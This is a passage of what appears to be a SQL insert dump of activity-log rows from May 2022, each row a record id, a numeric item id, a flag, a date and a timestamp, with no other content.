01:15:33'),(51759,4657,1,'2022-05-17','2022-05-17 01:31:16'),(51760,1606,1,'2022-05-17','2022-05-17 01:39:09'),(51761,2457,1,'2022-05-17','2022-05-17 01:47:01'),(51762,4657,1,'2022-05-17','2022-05-17 01:54:51'),(51763,4694,1,'2022-05-17','2022-05-17 02:03:39'),(51764,4524,1,'2022-05-17','2022-05-17 02:18:51'),(51765,1741,1,'2022-05-17','2022-05-17 02:42:19'),(51766,4529,1,'2022-05-17','2022-05-17 02:47:34'),(51767,3764,1,'2022-05-17','2022-05-17 02:47:34'),(51768,4524,1,'2022-05-17','2022-05-17 02:47:36'),(51769,3752,1,'2022-05-17','2022-05-17 03:13:31'),(51770,1600,1,'2022-05-17','2022-05-17 03:45:32'),(51771,1614,1,'2022-05-17','2022-05-17 03:58:19'),(51772,4608,1,'2022-05-17','2022-05-17 04:07:09'),(51773,91,1,'2022-05-17','2022-05-17 04:07:32'),(51774,4608,1,'2022-05-17','2022-05-17 04:08:23'),(51775,68,1,'2022-05-17','2022-05-17 04:18:39'),(51776,3069,1,'2022-05-17','2022-05-17 04:45:53'),(51777,1602,1,'2022-05-17','2022-05-17 05:47:26'),(51778,1594,1,'2022-05-17','2022-05-17 06:52:20'),(51779,4457,1,'2022-05-17','2022-05-17 07:10:02'),(51780,1588,1,'2022-05-17','2022-05-17 08:45:54'),(51781,76,1,'2022-05-17','2022-05-17 08:46:29'),(51782,1588,1,'2022-05-17','2022-05-17 08:46:34'),(51783,2457,1,'2022-05-17','2022-05-17 08:46:48'),(51784,2309,1,'2022-05-17','2022-05-17 08:48:34'),(51785,570,1,'2022-05-17','2022-05-17 08:58:38'),(51786,3438,1,'2022-05-17','2022-05-17 09:27:00'),(51787,4529,1,'2022-05-17','2022-05-17 09:27:03'),(51788,4524,1,'2022-05-17','2022-05-17 09:44:45'),(51789,570,1,'2022-05-17','2022-05-17 09:58:23'),(51790,4454,1,'2022-05-17','2022-05-17 10:10:48'),(51791,1594,1,'2022-05-17','2022-05-17 10:11:20'),(51792,1594,1,'2022-05-17','2022-05-17 10:13:42'),(51793,1600,1,'2022-05-17','2022-05-17 10:23:07'),(51794,1594,1,'2022-05-17','2022-05-17 10:24:18'),(51795,1594,1,'2022-05-17','2022-05-17 10:33:30'),(51796,3030,1,'2022-05-17','2022-05-17 10:34:55'),(51797,3060,1,'2022-05-17','2022-05-17 10:53:07'),(51798,1728,1,'2022-05-17','2022-05-17 11:11:58'),(51799,1728,1,'2022-05-17','2022-05-17 11:12:43'),(51800,1728,1,'2022-05-17','2022-05-17 11:13:21'),(51801,68,1,'2022-05-17','2022-05-17 11:20:00'),(51802,1582,1,'2022-05-17','2022-05-17 11:28:48'),(51803,89,1,'2022-05-17','2022-05-17 11:31:02'),(51804,1608,1,'2022-05-17','2022-05-17 11:31:27'),(51805,108,1,'2022-05-17','2022-05-17 11:35:27'),(51806,91,1,'2022-05-17','2022-05-17 11:36:09'),(51807,1728,1,'2022-05-17','2022-05-17 11:40:53'),(51808,1728,1,'2022-05-17','2022-05-17 11:41:13'),(51809,1588,1,'2022-05-17','2022-05-17 11:45:06'),(51810,1588,1,'2022-05-17','2022-05-17 11:47:10'),(51811,76,1,'2022-05-17','2022-05-17 11:47:32'),(51812,2769,1,'2022-05-17','2022-05-17 11:48:18'),(51813,3030,1,'2022-05-17','2022-05-17 12:18:02'),(51814,91,1,'2022-05-17','2022-05-17 12:27:40'),(51815,4436,1,'2022-05-17','2022-05-17 12:30:35'),(51816,91,1,'2022-05-17','2022-05-17 12:32:06'),(51817,4428,1,'2022-05-17','2022-05-17 12:32:35'),(51818,91,1,'2022-05-17','2022-05-17 12:32:57'),(51819,2154,1,'2022-05-17','2022-05-17 12:44:02'),(51820,91,1,'2022-05-17','2022-05-17 12:44:34'),(51821,1728,1,'2022-05-17','2022-05-17 12:48:03'),(51822,91,1,'2022-05-17','2022-05-17 12:49:14'),(51823,91,1,'2022-05-17','2022-05-17 12:53:10'),(51824,2152,1,'2022-05-17','2022-05-17 13:00:37'),(51825,76,1,'2022-05-17','2022-05-17 13:08:18'),(51826,3257,1,'2022-05-17','2022-05-17 13:08:19'),(51827,89,1,'2022-05-17','2022-05-17 13:10:02'),(51828,89,1,'2022-05-17','2022-05-17 13:10:41'),(51829,1594,1,'2022-05-17','2022-05-17 13:18:16'),(51830,89,1,'2022-05-17','2022-05-17 13:18:30'),(51831,1614,1,'2022-05-17','2022-05-17 13:48:42'),(51832,4566,1,'2022-05-17','2022-05-17 14:17:18'),(51833,1614,1,'2022-05-17','2022-05-17 14:27:47'),(51834,2159,1,'2022-05-17','2022-05-17 14:37:16'),(51835,2159,1,'2022-05-17','2022-05-17 14:38:05'),(51836,1870,1,'2022-05-17','2022-05-17 14:38:51'),(51837,2159,1,'2022-05-17','2022-05-17 14:40:08'),(51838,2159,1,'2022-05-17','2022-05-17 14:41:52'),(51839,2154,1,'2022-05-17','2022-05-17 15:00:56'),(51840,4645,1,'2022-05-17','2022-05-17 16:01:51'),(51841,1544,1,'2022-05-17','2022-05-17 16:17:24'),(51842,1594,1,'2022-05-17','2022-05-17 16:47:45'),(51843,2457,1,'2022-05-17','2022-05-17 17:31:56'),(51844,1602,1,'2022-05-17','2022-05-17 18:17:17'),(51845,1582,1,'2022-05-17','2022-05-17 18:32:12'),(51846,89,1,'2022-05-17','2022-05-17 19:12:22'),(51847,1602,1,'2022-05-17','2022-05-17 19:12:54'),(51848,1588,1,'2022-05-17','2022-05-17 19:12:57'),(51849,76,1,'2022-05-17','2022-05-17 19:15:31'),(51850,91,1,'2022-05-17','2022-05-17 19:32:50'),(51851,3438,1,'2022-05-17','2022-05-17 19:46:48'),(51852,1582,1,'2022-05-17','2022-05-17 19:57:50'),(51853,1600,1,'2022-05-17','2022-05-17 20:31:47'),(51854,3005,1,'2022-05-17','2022-05-17 21:03:26'),(51855,1594,1,'2022-05-17','2022-05-17 21:05:48'),(51856,1594,1,'2022-05-17','2022-05-17 21:06:12'),(51857,1703,1,'2022-05-17','2022-05-17 21:12:08'),(51858,1594,1,'2022-05-17','2022-05-17 21:25:12'),(51859,1594,1,'2022-05-17','2022-05-17 21:25:14'),(51860,89,1,'2022-05-17','2022-05-17 21:27:30'),(51861,89,1,'2022-05-17','2022-05-17 21:27:43'),(51862,91,1,'2022-05-17','2022-05-17 21:28:02'),(51863,91,1,'2022-05-17','2022-05-17 21:28:03'),(51864,4408,1,'2022-05-17','2022-05-17 21:56:41'),(51865,4566,1,'2022-05-17','2022-05-17 22:24:17'),(51866,2248,1,'2022-05-17','2022-05-17 22:42:07'),(51867,3251,1,'2022-05-17','2022-05-17 22:46:50'),(51868,3058,1,'2022-05-17','2022-05-17 23:09:17'),(51869,1728,1,'2022-05-17','2022-05-17 23:31:48'),(51870,1602,1,'2022-05-17','2022-05-17 23:32:19'),(51871,1703,1,'2022-05-18','2022-05-18 00:12:08'),(51872,3058,1,'2022-05-18','2022-05-18 00:19:04'),(51873,4238,1,'2022-05-18','2022-05-18 00:43:15'),(51874,80,1,'2022-05-18','2022-05-18 00:59:53'),(51875,4454,1,'2022-05-18','2022-05-18 01:00:10'),(51876,80,1,'2022-05-18','2022-05-18 01:11:45'),(51877,80,1,'2022-05-18','2022-05-18 01:13:09'),(51878,3706,1,'2022-05-18','2022-05-18 01:23:37'),(51879,3090,1,'2022-05-18','2022-05-18 01:56:41'),(51880,3706,1,'2022-05-18','2022-05-18 02:07:40'),(51881,2617,1,'2022-05-18','2022-05-18 02:24:03'),(51882,1745,1,'2022-05-18','2022-05-18 02:31:44'),(51883,1745,1,'2022-05-18','2022-05-18 02:33:37'),(51884,3030,1,'2022-05-18','2022-05-18 03:10:09'),(51885,2989,1,'2022-05-18','2022-05-18 03:54:59'),(51886,4657,1,'2022-05-18','2022-05-18 04:39:57'),(51887,4420,1,'2022-05-18','2022-05-18 05:13:08'),(51888,2309,1,'2022-05-18','2022-05-18 05:24:57'),(51889,482,1,'2022-05-18','2022-05-18 05:39:23'),(51890,3790,1,'2022-05-18','2022-05-18 07:46:23'),(51891,2991,1,'2022-05-18','2022-05-18 08:42:38'),(51892,4566,1,'2022-05-18','2022-05-18 09:07:11'),(51893,2965,1,'2022-05-18','2022-05-18 09:46:49'),(51894,1588,1,'2022-05-18','2022-05-18 10:08:05'),(51895,469,1,'2022-05-18','2022-05-18 10:13:54'),(51896,4436,1,'2022-05-18','2022-05-18 10:16:06'),(51897,68,1,'2022-05-18','2022-05-18 10:16:49'),(51898,1582,1,'2022-05-18','2022-05-18 10:32:41'),(51899,1705,1,'2022-05-18','2022-05-18 10:42:42'),(51900,80,1,'2022-05-18','2022-05-18 11:15:39'),(51901,1602,1,'2022-05-18','2022-05-18 11:16:44'),(51902,1606,1,'2022-05-18','2022-05-18 11:46:04'),(51903,3764,1,'2022-05-18','2022-05-18 12:58:58'),(51904,1594,1,'2022-05-18','2022-05-18 13:23:10'),(51905,4691,1,'2022-05-18','2022-05-18 13:27:49'),(51906,1602,1,'2022-05-18','2022-05-18 13:42:02'),(51907,3764,1,'2022-05-18','2022-05-18 13:44:05'),(51908,3764,1,'2022-05-18','2022-05-18 13:49:38'),(51909,4444,1,'2022-05-18','2022-05-18 13:54:24'),(51910,1596,1,'2022-05-18','2022-05-18 14:09:09'),(51911,2297,1,'2022-05-18','2022-05-18 14:41:29'),(51912,2309,1,'2022-05-18','2022-05-18 14:53:28'),(51913,4444,1,'2022-05-18','2022-05-18 16:13:09'),(51914,4448,1,'2022-05-18','2022-05-18 16:27:19'),(51915,68,1,'2022-05-18','2022-05-18 16:27:31'),(51916,76,1,'2022-05-18','2022-05-18 16:53:13'),(51917,84,1,'2022-05-18','2022-05-18 16:54:42'),(51918,84,1,'2022-05-18','2022-05-18 16:57:45'),(51919,1544,1,'2022-05-18','2022-05-18 16:59:28'),(51920,1877,1,'2022-05-18','2022-05-18 16:59:58'),(51921,1728,1,'2022-05-18','2022-05-18 17:04:51'),(51922,1728,1,'2022-05-18','2022-05-18 17:05:09'),(51923,2904,1,'2022-05-18','2022-05-18 17:05:45'),(51924,1586,1,'2022-05-18','2022-05-18 17:06:31'),(51925,2904,1,'2022-05-18','2022-05-18 17:06:33'),(51926,1606,1,'2022-05-18','2022-05-18 17:19:31'),(51927,1606,1,'2022-05-18','2022-05-18 17:21:44'),(51928,1728,1,'2022-05-18','2022-05-18 17:21:49'),(51929,3781,1,'2022-05-18','2022-05-18 19:04:34'),(51930,1602,1,'2022-05-18','2022-05-18 19:09:22'),(51931,3694,1,'2022-05-18','2022-05-18 19:18:51'),(51932,473,1,'2022-05-18','2022-05-18 21:02:01'),(51933,2704,1,'2022-05-18','2022-05-18 21:23:44'),(51934,4412,1,'2022-05-18','2022-05-18 21:34:40'),(51935,2617,1,'2022-05-18','2022-05-18 21:44:36'),(51936,3781,1,'2022-05-18','2022-05-18 22:14:47'),(51937,1592,1,'2022-05-18','2022-05-18 23:08:49'),(51938,1600,1,'2022-05-18','2022-05-18 23:11:58'),(51939,1588,1,'2022-05-18','2022-05-18 23:42:41'),(51940,106,1,'2022-05-18','2022-05-18 23:55:00'),(51941,1610,1,'2022-05-19','2022-05-19 00:08:05'),(51942,1610,1,'2022-05-19','2022-05-19 00:09:56'),(51943,68,1,'2022-05-19','2022-05-19 00:10:17'),(51944,1612,1,'2022-05-19','2022-05-19 00:15:49'),(51945,570,1,'2022-05-19','2022-05-19 00:45:33'),(51946,72,1,'2022-05-19','2022-05-19 00:53:07'),(51947,1728,1,'2022-05-19','2022-05-19 01:03:42'),(51948,1592,1,'2022-05-19','2022-05-19 03:36:35'),(51949,1592,1,'2022-05-19','2022-05-19 03:37:35'),(51950,4416,1,'2022-05-19','2022-05-19 04:13:01'),(51951,2558,1,'2022-05-19','2022-05-19 05:06:19'),(51952,2503,1,'2022-05-19','2022-05-19 06:01:17'),(51953,2617,1,'2022-05-19','2022-05-19 06:46:32'),(51954,1582,1,'2022-05-19','2022-05-19 07:40:29'),(51955,3531,1,'2022-05-19','2022-05-19 08:58:56'),(51956,1612,1,'2022-05-19','2022-05-19 09:11:46'),(51957,1612,1,'2022-05-19','2022-05-19 09:13:55'),(51958,1730,1,'2022-05-19','2022-05-19 09:21:26'),(51959,1606,1,'2022-05-19','2022-05-19 10:00:24'),(51960,76,1,'2022-05-19','2022-05-19 10:00:52'),(51961,91,1,'2022-05-19','2022-05-19 10:08:05'),(51962,1608,1,'2022-05-19','2022-05-19 10:09:30'),(51963,87,1,'2022-05-19','2022-05-19 10:34:22'),(51964,488,1,'2022-05-19','2022-05-19 10:35:05'),(51965,84,1,'2022-05-19','2022-05-19 10:36:31'),(51966,3694,1,'2022-05-19','2022-05-19 10:37:49'),(51967,474,1,'2022-05-19','2022-05-19 10:43:33'),(51968,1870,1,'2022-05-19','2022-05-19 10:44:21'),(51969,474,1,'2022-05-19','2022-05-19 10:44:48'),(51970,3705,1,'2022-05-19','2022-05-19 10:51:26'),(51971,3764,1,'2022-05-19','2022-05-19 11:53:26'),(51972,1586,1,'2022-05-19','2022-05-19 12:07:05'),(51973,91,1,'2022-05-19','2022-05-19 12:21:40'),(51974,1612,1,'2022-05-19','2022-05-19 13:01:02'),(51975,1594,1,'2022-05-19','2022-05-19 13:13:18'),(51976,1766,1,'2022-05-19','2022-05-19 13:34:03'),(51977,2309,1,'2022-05-19','2022-05-19 13:38:38'),(51978,1745,1,'2022-05-19','2022-05-19 13:38:45'),(51979,1745,1,'2022-05-19','2022-05-19 13:39:19'),(51980,87,1,'2022-05-19','2022-05-19 13:44:44'),(51981,1592,1,'2022-05-19','2022-05-19 13:55:05'),(51982,1592,1,'2022-05-19','2022-05-19 13:57:59'),(51983,91,1,'2022-05-19','2022-05-19 14:17:19'),(51984,1612,1,'2022-05-19','2022-05-19 14:31:33'),(51985,570,1,'2022-05-19','2022-05-19 14:45:11'),(51986,1602,1,'2022-05-19','2022-05-19 15:05:52'),(51987,4722,1,'2022-05-19','2022-05-19 15:16:33'),(51988,4722,1,'2022-05-19','2022-05-19 15:16:48'),(51989,1596,1,'2022-05-19','2022-05-19 15:23:31'),(51990,1598,1,'2022-05-19','2022-05-19 15:41:17'),(51991,570,1,'2022-05-19','2022-05-19 16:11:35'),(51992,4457,1,'2022-05-19','2022-05-19 16:12:41'),(51993,2309,1,'2022-05-19','2022-05-19 16:15:28'),(51994,1594,1,'2022-05-19','2022-05-19 16:18:40'),(51995,3004,1,'2022-05-19','2022-05-19 16:54:17'),(51996,3107,1,'2022-05-19','2022-05-19 16:55:42'),(51997,1586,1,'2022-05-19','2022-05-19 17:02:44'),(51998,76,1,'2022-05-19','2022-05-19 17:03:05'),(51999,1586,1,'2022-05-19','2022-05-19 17:03:19'),(52000,87,1,'2022-05-19','2022-05-19 17:03:40'),(52001,91,1,'2022-05-19','2022-05-19 17:04:30'),(52002,4440,1,'2022-05-19','2022-05-19 17:05:05'),(52003,87,1,'2022-05-19','2022-05-19 17:13:26'),(52004,2503,1,'2022-05-19','2022-05-19 17:13:44'),(52005,87,1,'2022-05-19','2022-05-19 17:14:28'),(52006,1586,1,'2022-05-19','2022-05-19 17:14:31'),(52007,80,1,'2022-05-19','2022-05-19 17:17:14'),(52008,80,1,'2022-05-19','2022-05-19 17:19:18'),(52009,3781,1,'2022-05-19','2022-05-19 17:59:25'),(52010,80,1,'2022-05-19','2022-05-19 18:52:34'),(52011,2617,1,'2022-05-19','2022-05-19 19:18:21'),(52012,1602,1,'2022-05-19','2022-05-19 19:18:39'),(52013,3781,1,'2022-05-19','2022-05-19 20:03:05'),(52014,469,1,'2022-05-19','2022-05-19 20:31:40'),(52015,3735,1,'2022-05-19','2022-05-19 23:01:32'),(52016,3781,1,'2022-05-19','2022-05-19 23:23:54'),(52017,570,1,'2022-05-20','2022-05-20 00:34:03'),(52018,1592,1,'2022-05-20','2022-05-20 01:01:57'),(52019,1612,1,'2022-05-20','2022-05-20 01:04:08'),(52020,2410,1,'2022-05-20','2022-05-20 02:20:54'),(52021,1600,1,'2022-05-20','2022-05-20 02:38:36'),(52022,1610,1,'2022-05-20','2022-05-20 03:29:55'),(52023,2617,1,'2022-05-20','2022-05-20 03:32:06'),(52024,472,1,'2022-05-20','2022-05-20 03:50:03'),(52025,3175,1,'2022-05-20','2022-05-20 04:02:44'),(52026,1596,1,'2022-05-20','2022-05-20 04:05:25'),(52027,3585,1,'2022-05-20','2022-05-20 04:20:43'),(52028,484,1,'2022-05-20','2022-05-20 04:37:25'),(52029,2309,1,'2022-05-20','2022-05-20 04:44:06'),(52030,2309,1,'2022-05-20','2022-05-20 04:44:26'),(52031,2309,1,'2022-05-20','2022-05-20 04:44:39'),(52032,2309,1,'2022-05-20','2022-05-20 04:47:23'),(52033,3034,1,'2022-05-20','2022-05-20 05:11:52'),(52034,3107,1,'2022-05-20','2022-05-20 05:32:51'),(52035,1602,1,'2022-05-20','2022-05-20 05:52:20'),(52036,80,1,'2022-05-20','2022-05-20 05:53:20'),(52037,1610,1,'2022-05-20','2022-05-20 06:03:10'),(52038,3691,1,'2022-05-20','2022-05-20 06:36:09'),(52039,3107,1,'2022-05-20','2022-05-20 07:05:07'),(52040,2911,1,'2022-05-20','2022-05-20 07:05:13'),(52041,4691,1,'2022-05-20','2022-05-20 07:36:25'),(52042,3051,1,'2022-05-20','2022-05-20 08:03:12'),(52043,1588,1,'2022-05-20','2022-05-20 08:30:55'),(52044,3226,1,'2022-05-20','2022-05-20 09:41:03'),(52045,1600,1,'2022-05-20','2022-05-20 10:00:51'),(52046,91,1,'2022-05-20','2022-05-20 10:05:38'),(52047,91,1,'2022-05-20','2022-05-20 10:06:18'),(52048,4542,1,'2022-05-20','2022-05-20 10:06:24'),(52049,4542,1,'2022-05-20','2022-05-20 10:06:53'),(52050,89,1,'2022-05-20','2022-05-20 10:11:19'),(52051,89,1,'2022-05-20','2022-05-20 10:11:48'),(52052,91,1,'2022-05-20','2022-05-20 10:11:59'),(52053,2063,1,'2022-05-20','2022-05-20 10:15:25'),(52054,2063,1,'2022-05-20','2022-05-20 10:15:37'),(52055,2063,1,'2022-05-20','2022-05-20 10:16:01'),(52056,2063,1,'2022-05-20','2022-05-20 10:16:18'),(52057,2063,1,'2022-05-20','2022-05-20 10:18:33'),(52058,2063,1,'2022-05-20','2022-05-20 10:19:01'),(52059,2063,1,'2022-05-20','2022-05-20 10:19:11'),(52060,91,1,'2022-05-20','2022-05-20 10:19:58'),(52061,2063,1,'2022-05-20','2022-05-20 10:20:10'),(52062,2063,1,'2022-05-20','2022-05-20 10:20:30'),(52063,2063,1,'2022-05-20','2022-05-20 10:20:41'),(52064,2063,1,'2022-05-20','2022-05-20 10:20:50'),(52065,4722,1,'2022-05-20','2022-05-20 10:25:15'),(52066,72,1,'2022-05-20','2022-05-20 10:29:37'),(52067,4719,1,'2022-05-20','2022-05-20 10:29:56'),(52068,1600,1,'2022-05-20','2022-05-20 10:31:43'),(52069,4719,1,'2022-05-20','2022-05-20 10:33:23'),(52070,80,1,'2022-05-20','2022-05-20 10:38:20'),(52071,1582,1,'2022-05-20','2022-05-20 10:48:19'),(52072,4719,1,'2022-05-20','2022-05-20 11:13:31'),(52073,72,1,'2022-05-20','2022-05-20 11:18:44'),(52074,4660,1,'2022-05-20','2022-05-20 13:58:23'),(52075,2813,1,'2022-05-20','2022-05-20 14:46:47'),(52076,4400,1,'2022-05-20','2022-05-20 15:57:01'),(52077,2809,1,'2022-05-21','2022-05-21 05:20:52'),(52078,3313,1,'2022-05-21','2022-05-21 10:01:49'),(52079,3030,1,'2022-05-21','2022-05-21 12:48:06'),(52080,335,1,'2022-05-21','2022-05-21 14:58:37'),(52081,4722,1,'2022-05-21','2022-05-21 15:15:19'),(52082,3781,1,'2022-05-21','2022-05-21 17:18:05'),(52083,4520,1,'2022-05-21','2022-05-21 20:58:20'),(52084,4654,1,'2022-05-21','2022-05-21 23:14:25'),(52085,2911,1,'2022-05-22','2022-05-22 07:13:37'),(52086,4657,1,'2022-05-22','2022-05-22 16:24:33'),(52087,335,1,'2022-05-22','2022-05-22 17:11:20'),(52088,3771,1,'2022-05-22','2022-05-22 19:29:42'),(52089,4712,1,'2022-05-22','2022-05-22 21:17:01'),(52090,3030,1,'2022-05-22','2022-05-22 21:56:04'),(52091,72,1,'2022-05-22','2022-05-22 22:50:08'),(52092,87,1,'2022-05-23','2022-05-23 00:17:05'),(52093,80,1,'2022-05-23','2022-05-23 09:04:37'),(52094,3710,1,'2022-05-23','2022-05-23 10:03:48'),(52095,76,1,'2022-05-23','2022-05-23 10:47:25'),(52096,76,1,'2022-05-23','2022-05-23 11:38:52'),(52097,2813,1,'2022-05-23','2022-05-23 11:45:59'),(52098,91,1,'2022-05-23','2022-05-23 12:09:18'),(52099,89,1,'2022-05-23','2022-05-23 12:18:47'),(52100,4709,1,'2022-05-23','2022-05-23 12:58:35'),(52101,3710,1,'2022-05-23','2022-05-23 12:59:12'),(52102,4709,1,'2022-05-23','2022-05-23 13:00:03'),(52103,4706,1,'2022-05-23','2022-05-23 13:19:46'),(52104,91,1,'2022-05-23','2022-05-23 15:32:14'),(52105,91,1,'2022-05-23','2022-05-23 15:33:30'),(52106,68,1,'2022-05-23','2022-05-23 15:35:06'),(52107,68,1,'2022-05-23','2022-05-23 16:18:15'),(52108,80,1,'2022-05-23','2022-05-23 16:19:05'),(52109,68,1,'2022-05-23','2022-05-23 16:23:27'),(52110,80,1,'2022-05-23','2022-05-23 16:23:32'),(52111,68,1,'2022-05-23','2022-05-23 16:25:16'),(52112,89,1,'2022-05-23','2022-05-23 16:25:26'),(52113,68,1,'2022-05-23','2022-05-23 16:26:13'),(52114,91,1,'2022-05-23','2022-05-23 16:26:26'),(52115,68,1,'2022-05-23','2022-05-23 16:26:43'),(52116,87,1,'2022-05-23','2022-05-23 16:26:54'),(52117,87,1,'2022-05-23','2022-05-23 16:27:25'),(52118,87,1,'2022-05-23','2022-05-23 16:27:34'),(52119,87,1,'2022-05-23','2022-05-23 16:27:56'),(52120,87,1,'2022-05-23','2022-05-23 16:28:23'),(52121,72,1,'2022-05-23','2022-05-23 16:28:38'),(52122,72,1,'2022-05-23','2022-05-23 16:29:15'),(52123,72,1,'2022-05-23','2022-05-23 16:29:47'),(52124,91,1,'2022-05-23','2022-05-23 16:30:38'),(52125,4712,1,'2022-05-23','2022-05-23 16:32:30'),(52126,4688,1,'2022-05-23','2022-05-23 16:33:55'),(52127,72,1,'2022-05-23','2022-05-23 16:36:04'),(52128,72,1,'2022-05-23','2022-05-23 16:36:07'),(52129,72,1,'2022-05-23','2022-05-23 16:36:11'),(52130,87,1,'2022-05-23','2022-05-23 16:36:16'),(52131,80,1,'2022-05-23','2022-05-23 19:29:05'),(52132,84,1,'2022-05-23','2022-05-23 22:14:56'),(52133,2813,1,'2022-05-23','2022-05-23 22:36:09'),(52134,91,1,'2022-05-23','2022-05-23 22:52:00'),(52135,2503,1,'2022-05-23','2022-05-23 23:10:01'),(52136,3127,1,'2022-05-23','2022-05-23 23:27:58'),(52137,4520,1,'2022-05-24','2022-05-24 02:04:44'),(52138,3307,1,'2022-05-24','2022-05-24 02:23:23'),(52139,4454,1,'2022-05-24','2022-05-24 10:02:17'),(52140,87,1,'2022-05-24','2022-05-24 10:42:04'),(52141,76,1,'2022-05-24','2022-05-24 11:07:58'),(52142,74,1,'2022-05-24','2022-05-24 11:08:22'),(52143,76,1,'2022-05-24','2022-05-24 11:53:37'),(52144,3486,1,'2022-05-24','2022-05-24 12:02:12'),(52145,68,1,'2022-05-24','2022-05-24 12:44:36'),(52146,87,1,'2022-05-24','2022-05-24 14:20:33'),(52147,91,1,'2022-05-24','2022-05-24 16:01:08'),(52148,91,1,'2022-05-24','2022-05-24 16:08:30'),(52149,3721,1,'2022-05-24','2022-05-24 18:12:04'),(52150,80,1,'2022-05-24','2022-05-24 18:24:08'),(52151,84,1,'2022-05-24','2022-05-24 21:44:34'),(52152,87,1,'2022-05-24','2022-05-24 22:41:19'),(52153,3479,1,'2022-05-24','2022-05-24 23:44:31'),(52154,72,1,'2022-05-25','2022-05-25 00:09:54'),(52155,2503,1,'2022-05-25','2022-05-25 00:14:34'),(52156,4520,1,'2022-05-25','2022-05-25 00:47:48'),(52157,80,1,'2022-05-25','2022-05-25 01:45:04'),(52158,3764,1,'2022-05-25','2022-05-25 09:35:51'),(52159,68,1,'2022-05-25','2022-05-25 10:26:39'),(52160,87,1,'2022-05-25','2022-05-25 11:07:03'),(52161,91,1,'2022-05-25','2022-05-25 11:21:48'),(52162,3030,1,'2022-05-25','2022-05-25 12:35:30'),(52163,3721,1,'2022-05-25','2022-05-25 14:31:45'),(52164,4335,1,'2022-05-25','2022-05-25 15:07:07'),(52165,89,1,'2022-05-25','2022-05-25 17:08:17'),(52166,72,1,'2022-05-25','2022-05-25 17:09:23'),(52167,91,1,'2022-05-25','2022-05-25 17:10:54'),(52168,335,1,'2022-05-25','2022-05-25 17:30:16'),(52169,3090,1,'2022-05-25','2022-05-25 17:45:38'),(52170,4341,1,'2022-05-25','2022-05-25 18:46:44'),(52171,72,1,'2022-05-25','2022-05-25 23:38:13'),(52172,2503,1,'2022-05-26','2022-05-26 00:55:51'),(52173,3313,1,'2022-05-26','2022-05-26 01:04:49'),(52174,3117,1,'2022-05-26','2022-05-26 01:19:42'),(52175,4700,1,'2022-05-26','2022-05-26 01:29:40'),(52176,91,1,'2022-05-26','2022-05-26 01:30:28'),(52177,4700,1,'2022-05-26','2022-05-26 04:03:54'),(52178,3090,1,'2022-05-26','2022-05-26 04:34:37'),(52179,3290,1,'2022-05-26','2022-05-26 05:27:26'),(52180,72,1,'2022-05-26','2022-05-26 14:22:35'),(52181,72,1,'2022-05-26','2022-05-26 14:29:32'),(52182,87,1,'2022-05-26','2022-05-26 14:31:34'),(52183,72,1,'2022-05-26','2022-05-26 14:32:59'),(52184,87,1,'2022-05-26','2022-05-26 14:34:02'),(52185,72,1,'2022-05-26','2022-05-26 15:42:05'),(52186,72,1,'2022-05-26','2022-05-26 15:42:31'),(52187,72,1,'2022-05-26','2022-05-26 15:43:01'),(52188,80,1,'2022-05-26','2022-05-26 15:43:49'),(52189,2503,1,'2022-05-26','2022-05-26 15:44:02'),(52190,72,1,'2022-05-26','2022-05-26 15:44:55'),(52191,72,1,'2022-05-26','2022-05-26 15:45:24'),(52192,72,1,'2022-05-26','2022-05-26 16:00:41'),(52193,1544,1,'2022-05-26','2022-05-26 18:59:17'),(52194,1544,1,'2022-05-26','2022-05-26 19:04:47'),(52195,68,1,'2022-05-26','2022-05-26 19:04:55'),(52196,1544,1,'2022-05-26','2022-05-26 19:05:22'),(52197,1544,1,'2022-05-26','2022-05-26 19:06:48'),(52198,1544,1,'2022-05-26','2022-05-26 19:07:12'),(52199,68,1,'2022-05-26','2022-05-26 19:07:30'),(52200,1544,1,'2022-05-26','2022-05-26 19:07:36'),(52201,470,1,'2022-05-26','2022-05-26 20:06:47'),(52202,470,1,'2022-05-26','2022-05-26 20:09:36'),(52203,1602,1,'2022-05-26','2022-05-26 22:38:25'),(52204,1614,1,'2022-05-26','2022-05-26 22:57:37'),(52205,1596,1,'2022-05-26','2022-05-26 23:03:20'),(52206,4520,1,'2022-05-26','2022-05-26 23:21:05'),(52207,4424,1,'2022-05-26','2022-05-26 23:48:35'),(52208,4700,1,'2022-05-27','2022-05-27 00:33:32'),(52209,1728,1,'2022-05-27','2022-05-27 00:52:53'),(52210,2297,1,'2022-05-27','2022-05-27 00:59:43'),(52211,72,1,'2022-05-27','2022-05-27 01:46:22'),(52212,72,1,'2022-05-27','2022-05-27 01:48:02'),(52213,1596,1,'2022-05-27','2022-05-27 02:03:57'),(52214,2150,1,'2022-05-27','2022-05-27 02:57:36'),(52215,4400,1,'2022-05-27','2022-05-27 03:50:39'),(52216,3251,1,'2022-05-27','2022-05-27 03:50:41'),(52217,1608,1,'2022-05-27','2022-05-27 07:03:59'),(52218,80,1,'2022-05-27','2022-05-27 07:20:46'),(52219,4416,1,'2022-05-27','2022-05-27 07:49:29'),(52220,1592,1,'2022-05-27','2022-05-27 08:07:17'),(52221,3691,1,'2022-05-27','2022-05-27 08:19:40'),(52222,1588,1,'2022-05-27','2022-05-27 08:31:02'),(52223,1602,1,'2022-05-27','2022-05-27 09:23:37'),(52224,1598,1,'2022-05-27','2022-05-27 09:25:36'),(52225,2991,1,'2022-05-27','2022-05-27 09:54:49'),(52226,1608,1,'2022-05-27','2022-05-27 10:03:10'),(52227,1594,1,'2022-05-27','2022-05-27 10:07:51'),(52228,1582,1,'2022-05-27','2022-05-27 10:12:06'),(52229,84,1,'2022-05-27','2022-05-27 10:13:23'),(52230,1582,1,'2022-05-27','2022-05-27 10:13:41'),(52231,87,1,'2022-05-27','2022-05-27 10:13:56'),(52232,4408,1,'2022-05-27','2022-05-27 10:16:47'),(52233,1604,1,'2022-05-27','2022-05-27 10:36:14'),(52234,4416,1,'2022-05-27','2022-05-27 10:47:57'),(52235,3030,1,'2022-05-27','2022-05-27 10:52:54'),(52236,1596,1,'2022-05-27','2022-05-27 11:02:42'),(52237,2297,1,'2022-05-27','2022-05-27 11:26:08'),(52238,1598,1,'2022-05-27','2022-05-27 11:27:03'),(52239,2297,1,'2022-05-27','2022-05-27 11:31:00'),(52240,91,1,'2022-05-27','2022-05-27 12:03:28'),(52241,91,1,'2022-05-27','2022-05-27 12:04:59'),(52242,4587,1,'2022-05-27','2022-05-27 12:05:29'),(52243,4440,1,'2022-05-27','2022-05-27 12:11:28'),(52244,91,1,'2022-05-27','2022-05-27 12:26:22'),(52245,68,1,'2022-05-27','2022-05-27 12:30:55'),(52246,76,1,'2022-05-27','2022-05-27 12:31:01'),(52247,80,1,'2022-05-27','2022-05-27 